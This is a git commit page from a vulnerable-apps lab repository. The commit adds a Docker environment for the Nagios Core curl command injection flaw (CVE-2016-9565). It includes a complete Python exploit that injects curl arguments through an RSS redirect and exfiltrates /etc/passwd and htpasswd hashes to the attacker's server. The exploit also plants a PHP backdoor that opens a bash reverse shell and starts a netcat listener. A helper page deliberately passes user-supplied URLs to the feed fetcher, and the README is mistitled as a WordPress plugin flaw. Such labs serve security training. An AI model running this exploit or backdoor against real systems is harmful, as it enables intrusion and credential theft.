admin/VulApps
1
0
Fork 0
mirror of https://github.com/Medicean/VulApps.git synced 2025-06-21 10:20:20 +00:00
Code Issues Packages Projects Releases Wiki Activity

(Add Vul: Nagios) 添加Nagios Core < 4.2.2 代码执行漏洞(CVE-2016-9565)

Browse Source
This commit is contained in:
Medicean 2016-12-16 21:21:32 +08:00
parent 57e03b47bb
commit ca0080216b
7 changed files with 748 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
README.md
View File

@ -56,6 +56,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
* [C](#c) * [C](#c)
* [I](#i) * [I](#i)
* [J](#j) * [J](#j)
* [N](#n)
* [O](#o) * [O](#o)
* [R](#r) * [R](#r)
* [S](#s) * [S](#s)
@ -82,6 +83,10 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
* [Jenkins](./j/jenkins/) * [Jenkins](./j/jenkins/)
* [Joomla!](./j/joomla/) * [Joomla!](./j/joomla/)
### [N](./j/)<div id="n"></div>
* [Nagios](./nagios/)
### [O](./o/)<div id="o"></div> ### [O](./o/)<div id="o"></div>
* [OpenSSL](./o/openssl/) * [OpenSSL](./o/openssl/)

4
n/README.md Normal file
View File

@ -0,0 +1,4 @@
N
---
* [Nagios](./nagios/)

8
n/nagios/1/Dockerfile Normal file
View File

@ -0,0 +1,8 @@
FROM quantumobject/docker-nagios:latest
COPY src/exp.php /usr/local/nagios/share/exp.php
RUN set -x \
&& sed -i '99d' /usr/local/nagios/share/includes/rss/rss_fetch.inc \
&& mkdir /tmp/tmp && chown www-data:www-data /tmp/tmp \
&& chown nagios:nagios /usr/local/nagios/share/exp.php

98
n/nagios/1/README.md Normal file
View File

@ -0,0 +1,98 @@
## WordPress Mailpress Plugin 远程代码执行漏洞
### 漏洞信息
* [Nagios Core < 4.2.2 Curl Command Injection/Code Execution](https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html)
Nagios 是一款监控IT基础设施的程序近日安全研究人员 Dawid Golunski 发现在 Nagios Core 中存在一个代码执行漏洞:攻击者首先伪装成 RSS 订阅源,当受害应用获取 RSS 信息时攻击者将恶意构造的数据传给受害者,程序在处理过程中将恶意数据注入到了 curl 的命令中,进而代码执行。
### 漏洞分析
参考: [Nagios Core 代码执行漏洞CVE-2016-9565分析](http://paper.seebug.org/146/)
### 镜像信息
类型 | 用户名 | 密码
:-:|:-:|:-:
HTTP 基础认证 | nagiosadmin | admin
Web 路径 | /nagios/ | -
Web 物理路径 | /usr/local/nagios/share | -
PoC/Exp 路径 | /nagios/exp.php?url=http://xx.xxx.xxx.xx/ | -
### 获取环境:
1. 拉取镜像到本地
```
$ docker pull medicean/vulapps:n_nagios_1
```
2. 启动环境
```
$ docker run -d -p 8000:80 medicean/vulapps:n_nagios_1
```
> `-p 8000:80` 前面的 8000 代表物理机的端口,可随意指定。
访问: `http://127.0.0.1:8000/nagios/` 出现基础认证框则代表成功
### 使用与利用
#### Exp 使用
> 假定攻击者服务器 IP 地址为2.2.2.2
1. 在攻击者服务器运行 nagios_cmd_injection.py
```
sudo python nagios_cmd_injection.py 2.2.2.3 9999
```
> 2.2.2.3 是攻击者监听反弹 shell 的IP地址可与RSS地址一样
2. 访问 http://xxxx/nagios/exp.php?url=http://2.2.2.2/
输入 HTTP 基础认证的账号密码
> exp.php 是验证漏洞时添加的,真实环境中不存在。注意最后一个 `/`
3. 在攻击者服务器看到如下输出即代表成功
```
➜ sudo python nagios_cmd_injection.py 192.168.30.194 8080
Nagios Core < 4.2.0 Curl Command Injection / Code Execution PoC Exploit
CVE-2016-9565
nagios_cmd_injection.py ver. 1.0
[+] Generating SSL certificate for our python HTTPS web server
[+] Starting the web server on ports 80 & 443
[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)
[+] Received GET request from Nagios server (192.168.30.xxx) ! Sending redirect to inject our curl payload:
-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii /usr/local/nagios/share/nagios-backdoor.php
[+] Success, curl payload injected! Received data back from the Nagios server 192.168.30.xxx
[*] Contents of /etc/passwd file from the target:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
nagios:x:999:999::/usr/local/nagios:
[*] Contents of /usr/local/nagios/etc/htpasswd.users file:
nagiosadmin:$apr1$c3z3k5K8$lk.GET0vWb.WWJidJt84o1
```
### 参考链接
* [Nagios Core < 4.2.2 Curl Command Injection/Code Execution](https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html)
* [Nagios Core 代码执行漏洞CVE-2016-9565分析](http://paper.seebug.org/146/)

173
n/nagios/1/nagios_cmd_injection.py Normal file
View File

@ -0,0 +1,173 @@
#!/usr/bin/env python
intro = """\033[94m
Nagios Core < 4.2.0 Curl Command Injection / Code Execution PoC Exploit
CVE-2016-9565
nagios_cmd_injection.py ver. 1.0
Discovered & Coded by:
Dawid Golunski
https://legalhackers.com
\033[0m
"""
usage = """
This PoC exploit can allow well-positioned attackers to extract and write
arbitrary files on the Nagios server which can lead to arbitrary code execution
on Nagios deployments that follow the official Nagios installation guidelines.
For details, see the full advisory at:
https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
PoC Video:
https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
Follow https://twitter.com/dawid_golunski for updates on this advisory.
Remember you can turn the nagios shell into root shell via CVE-2016-9565:
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
Usage:
./nagios_cmd_injection.py reverse_shell_ip [reverse_shell_port]
Disclaimer:
For testing purposes only. Do no harm.
"""
import os
import sys
import time
import re
import tornado.httpserver
import tornado.web
import tornado.ioloop
exploited = 0
docroot_rw = 0
class MainHandler(tornado.web.RequestHandler):
def get(self):
global exploited
if (exploited == 1):
self.finish()
else:
ua = self.request.headers['User-Agent']
if "Magpie" in ua:
print "[+] Received GET request from Nagios server (%s) ! Sending redirect to inject our curl payload:\n" % self.request.remote_ip
print '-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '\n'
self.redirect('https://' + self.request.host + '/nagioshack" -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '"', permanent=False)
exploited = 1
def post(self):
global docroot_rw
print "[+] Success, curl payload injected! Received data back from the Nagios server %s\n" % self.request.remote_ip
# Extract /etc/passwd from the target
passwd = self.request.files['passwd'][0]['body']
print "[*] Contents of /etc/passwd file from the target:\n\n%s" % passwd
# Extract /usr/local/nagios/etc/htpasswd.users
htauth = self.request.files['htauth'][0]['body']
print "[*] Contents of /usr/local/nagios/etc/htpasswd.users file:\n\n%s" % htauth
# Extract nagios group from /etc/group
group = self.request.files['group'][0]['body']
for line in group.splitlines():
if "nagios:" in line:
nagios_group = line
print "[*] Retrieved nagios group line from /etc/group file on the target: %s\n" % nagios_group
if "www-data" in nagios_group:
print "[+] Happy days, 'www-data' user belongs to 'nagios' group! (meaning writable webroot)\n"
docroot_rw = 1
# Put backdoor PHP payload within the 'Server' response header so that it gets properly saved via the curl 'trace-ascii'
# option. The output trace should contain an unwrapped line similar to:
#
# == Info: Server <?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &'"); ?> is not blacklisted
#
# which will do the trick as it won't mess up the payload :)
self.add_header('Server', backdoor)
# Return XML/feed with JavaScript payload that will run the backdoor code from nagios-backdoor.php via <img src=> tag :)
print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n"
self.write(xmldata)
self.finish()
tornado.ioloop.IOLoop.instance().stop()
if __name__ == "__main__":
global backdoor_path
global backdoor
print intro
# Set attacker's external IP & port to be used by the reverse shell
if len(sys.argv) < 2 :
print usage
sys.exit(2)
attacker_ip = sys.argv[1]
if len(sys.argv) == 3 :
attacker_port = sys.argv[1]
else:
attacker_port = 8080
# PHP backdoor to be saved on the target Nagios server
backdoor_path = '/usr/local/nagios/share/nagios-backdoor.php'
backdoor = """<?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1 &'"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)
# Feed XML containing JavaScript payload that will load the nagios-backdoor.php script
global xmldata
xmldata = """<?xml version="1.0"?>
<rss version="2.0">
<channel>
<title>Nagios feed with injected JS payload</title>
<item>
<title>Item 1</title>
<description>
<strong>Feed injected. Here we go </strong> -
loading /nagios/nagios-backdoor.php now via img tag... check your netcat listener for nagios shell ;)
<img src="/nagios/nagios-backdoor.php" onerror="alert('Reverse Shell /nagios/nagios-backdoor.php executed!')">
</description>
</item>
</channel>
</rss> """
# Generate SSL cert
print "[+] Generating SSL certificate for our python HTTPS web server \n"
os.system("echo -e '\n\n\n\n\n\n\n\n\n' | openssl req -nodes -new -x509 -keyout server.key -out server.cert 2>/dev/null")
print "[+] Starting the web server on ports 80 & 443 \n"
application = tornado.web.Application([
(r'/.*', MainHandler)
])
application.listen(80)
http_server = tornado.httpserver.HTTPServer(
application,
ssl_options = {
"certfile": os.path.join("./", "server.cert"),
"keyfile": os.path.join("./", "server.key"),
}
)
http_server.listen(443)
print "[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)\n"
tornado.ioloop.IOLoop.current().start()
if (docroot_rw == 1):
print "[+] PHP backdoor should have been saved in %s on the target by now!\n" % backdoor_path
print "[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)\n"
os.system("nc -v -l -p 8080")
print "\n[+] Shell closed\n"
print "[+] That's all. Exiting\n"

456
n/nagios/1/src/exp.php Normal file
View File

@ -0,0 +1,456 @@
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes">
<title>README</title>
<style type="text/css">
body {
font-family: Helvetica, arial, sans-serif;
font-size: 14px;
line-height: 1.6;
padding-top: 10px;
padding-bottom: 10px;
background-color: white;
padding: 30px; }
body > *:first-child {
margin-top: 0 !important; }
body > *:last-child {
margin-bottom: 0 !important; }
a {
color: #4183C4; }
a.absent {
color: #cc0000; }
a.anchor {
display: block;
padding-left: 30px;
margin-left: -30px;
cursor: pointer;
position: absolute;
top: 0;
left: 0;
bottom: 0; }
h1, h2, h3, h4, h5, h6 {
margin: 20px 0 10px;
padding: 0;
font-weight: bold;
-webkit-font-smoothing: antialiased;
cursor: text;
position: relative; }
h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
text-decoration: none; }
h1 tt, h1 code {
font-size: inherit; }
h2 tt, h2 code {
font-size: inherit; }
h3 tt, h3 code {
font-size: inherit; }
h4 tt, h4 code {
font-size: inherit; }
h5 tt, h5 code {
font-size: inherit; }
h6 tt, h6 code {
font-size: inherit; }
h1 {
font-size: 28px;
color: black; }
h2 {
font-size: 24px;
border-bottom: 1px solid #cccccc;
color: black; }
h3 {
font-size: 18px; }
h4 {
font-size: 16px; }
h5 {
font-size: 14px; }
h6 {
color: #777777;
font-size: 14px; }
p, blockquote, ul, ol, dl, li, table, pre {
margin: 15px 0; }
hr {
background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
border: 0 none;
color: #cccccc;
height: 4px;
padding: 0;
}
body > h2:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child + h2 {
margin-top: 0;
padding-top: 0; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
margin-top: 0;
padding-top: 0; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
margin-top: 0;
padding-top: 0; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
margin-top: 0; }
li p.first {
display: inline-block; }
li {
margin: 0; }
ul, ol {
padding-left: 30px; }
ul :first-child, ol :first-child {
margin-top: 0; }
dl {
padding: 0; }
dl dt {
font-size: 14px;
font-weight: bold;
font-style: italic;
padding: 0;
margin: 15px 0 5px; }
dl dt:first-child {
padding: 0; }
dl dt > :first-child {
margin-top: 0; }
dl dt > :last-child {
margin-bottom: 0; }
dl dd {
margin: 0 0 15px;
padding: 0 15px; }
dl dd > :first-child {
margin-top: 0; }
dl dd > :last-child {
margin-bottom: 0; }
blockquote {
border-left: 4px solid #dddddd;
padding: 0 15px;
color: #777777; }
blockquote > :first-child {
margin-top: 0; }
blockquote > :last-child {
margin-bottom: 0; }
table {
padding: 0;border-collapse: collapse; }
table tr {
border-top: 1px solid #cccccc;
background-color: white;
margin: 0;
padding: 0; }
table tr:nth-child(2n) {
background-color: #f8f8f8; }
table tr th {
font-weight: bold;
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr td {
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr th :first-child, table tr td :first-child {
margin-top: 0; }
table tr th :last-child, table tr td :last-child {
margin-bottom: 0; }
img {
max-width: 100%; }
span.frame {
display: block;
overflow: hidden; }
span.frame > span {
border: 1px solid #dddddd;
display: block;
float: left;
overflow: hidden;
margin: 13px 0 0;
padding: 7px;
width: auto; }
span.frame span img {
display: block;
float: left; }
span.frame span span {
clear: both;
color: #333333;
display: block;
padding: 5px 0 0; }
span.align-center {
display: block;
overflow: hidden;
clear: both; }
span.align-center > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: center; }
span.align-center span img {
margin: 0 auto;
text-align: center; }
span.align-right {
display: block;
overflow: hidden;
clear: both; }
span.align-right > span {
display: block;
overflow: hidden;
margin: 13px 0 0;
text-align: right; }
span.align-right span img {
margin: 0;
text-align: right; }
span.float-left {
display: block;
margin-right: 13px;
overflow: hidden;
float: left; }
span.float-left span {
margin: 13px 0 0; }
span.float-right {
display: block;
margin-left: 13px;
overflow: hidden;
float: right; }
span.float-right > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: right; }
code, tt {
margin: 0 2px;
padding: 0 5px;
white-space: nowrap;
border: 1px solid #eaeaea;
background-color: #f8f8f8;
border-radius: 3px; }
pre code {
margin: 0;
padding: 0;
white-space: pre;
border: none;
background: transparent; }
.highlight pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre code, pre tt {
background-color: transparent;
border: none; }
sup {
font-size: 0.83em;
vertical-align: super;
line-height: 0;
}
* {
-webkit-print-color-adjust: exact;
}
@media screen and (min-width: 914px) {
body {
width: 854px;
margin:0 auto;
}
}
@media print {
table, pre {
page-break-inside: avoid;
}
pre {
word-wrap: break-word;
}
}
</style>
</head>
<body>
<h2 id="toc_0">WordPress Mailpress Plugin 远程代码执行漏洞</h2>
<h3 id="toc_1">漏洞信息</h3>
<ul>
<li><a href="https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html">Nagios Core &lt; 4.2.2 Curl Command Injection/Code Execution</a></li>
</ul>
<p>Nagios 是一款监控IT基础设施的程序近日安全研究人员 Dawid Golunski 发现在 Nagios Core 中存在一个代码执行漏洞:攻击者首先伪装成 RSS 订阅源,当受害应用获取 RSS 信息时攻击者将恶意构造的数据传给受害者,程序在处理过程中将恶意数据注入到了 curl 的命令中,进而代码执行。</p>
<h3 id="toc_2">漏洞分析</h3>
<p>参考: <a href="http://paper.seebug.org/146/">Nagios Core 代码执行漏洞CVE-2016-9565)分析</a></p>
<h3 id="toc_3">镜像信息</h3>
<table>
<thead>
<tr>
<th style="text-align: center">类型</th>
<th style="text-align: center">用户名</th>
<th style="text-align: center">密码</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center">HTTP 基础认证</td>
<td style="text-align: center">nagiosadmin</td>
<td style="text-align: center">admin</td>
</tr>
<tr>
<td style="text-align: center">Web 路径</td>
<td style="text-align: center">/nagios/</td>
<td style="text-align: center">-</td>
</tr>
<tr>
<td style="text-align: center">Web 物理路径</td>
<td style="text-align: center">/usr/local/nagios/share</td>
<td style="text-align: center">-</td>
</tr>
<tr>
<td style="text-align: center">PoC/Exp 路径</td>
<td style="text-align: center">/nagios/exp.php?url=http://xx.xxx.xxx.xx/</td>
<td style="text-align: center">-</td>
</tr>
</tbody>
</table>
<h3 id="toc_4">获取环境:</h3>
<ol>
<li><p>拉取镜像到本地</p>
<div><pre><code class="language-none">$ docker pull medicean/vulapps:n_nagios_1</code></pre></div></li>
<li><p>启动环境</p>
<div><pre><code class="language-none">$ docker run -d -p 8000:80 medicean/vulapps:n_nagios_1</code></pre></div>
<blockquote>
<p><code>-p 8000:80</code> 前面的 8000 代表物理机的端口,可随意指定。 </p>
</blockquote></li>
</ol>
<p>访问: <code>http://127.0.0.1:8000/nagios/</code> 出现基础认证框则代表成功</p>
<h3 id="toc_5">使用与利用</h3>
<h4 id="toc_6">Exp 使用</h4>
<blockquote>
<p>假定攻击者服务器 IP 地址为2.2.2.2</p>
</blockquote>
<ol>
<li><p>在攻击者服务器运行 nagios<em>cmd</em>injection.py</p>
<div><pre><code class="language-none">sudo python nagios_cmd_injection.py 2.2.2.3 9999</code></pre></div>
<blockquote>
<p>2.2.2.3 是攻击者监听反弹 shell 的IP地址可与RSS地址一样</p>
</blockquote></li>
<li><p>访问 http://xxxx/nagios/exp.php?url=http://2.2.2.2/</p>
<p>输入 HTTP 基础认证的账号密码</p>
<blockquote>
<p>exp.php 是验证漏洞时添加的,真实环境中不存在。注意最后一个 <code>/</code></p>
</blockquote></li>
<li><p>在攻击者服务器看到如下输出即代表成功 </p>
<div><pre><code class="language-none"> sudo python nagios_cmd_injection.py 192.168.30.194 8080
Nagios Core &lt; 4.2.0 Curl Command Injection / Code Execution PoC Exploit
CVE-2016-9565
nagios_cmd_injection.py ver. 1.0
[+] Generating SSL certificate for our python HTTPS web server
[+] Starting the web server on ports 80 &amp; 443
[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)
[+] Received GET request from Nagios server (192.168.30.xxx) ! Sending redirect to inject our curl payload:
-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii /usr/local/nagios/share/nagios-backdoor.php
[+] Success, curl payload injected! Received data back from the Nagios server 192.168.30.xxx
[*] Contents of /etc/passwd file from the target:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
nagios:x:999:999::/usr/local/nagios:
[*] Contents of /usr/local/nagios/etc/htpasswd.users file:
nagiosadmin:$apr1$c3z3k5K8$lk.GET0vWb.WWJidJt84o1</code></pre></div></li>
</ol>
<h3 id="toc_7">参考链接</h3>
<ul>
<li><a href="https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html">Nagios Core &lt; 4.2.2 Curl Command Injection/Code Execution</a></li>
<li><a href="http://paper.seebug.org/146/">Nagios Core 代码执行漏洞CVE-2016-9565)分析</a></li>
</ul>
</body>
</html>
<?php
// RSS reader
define('MAGPIE_DIR', './includes/rss/');
define('MAGPIE_CACHE_ON', 0);
define('MAGPIE_CACHE_AGE', 0);
define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache');
require(MAGPIE_DIR.'rss_fetch.inc');
$url = "http://blog.evalbug.com/atom.xml";
if (isset($_REQUEST['url'])) {
$url = $_REQUEST['url'];
}
fetch_rss($url);

4
n/nagios/README.md Normal file
View File

@ -0,0 +1,4 @@
Nagios
---
1. [Nagios Core < 4.2.2 代码执行漏洞CVE-2016-9565](1/)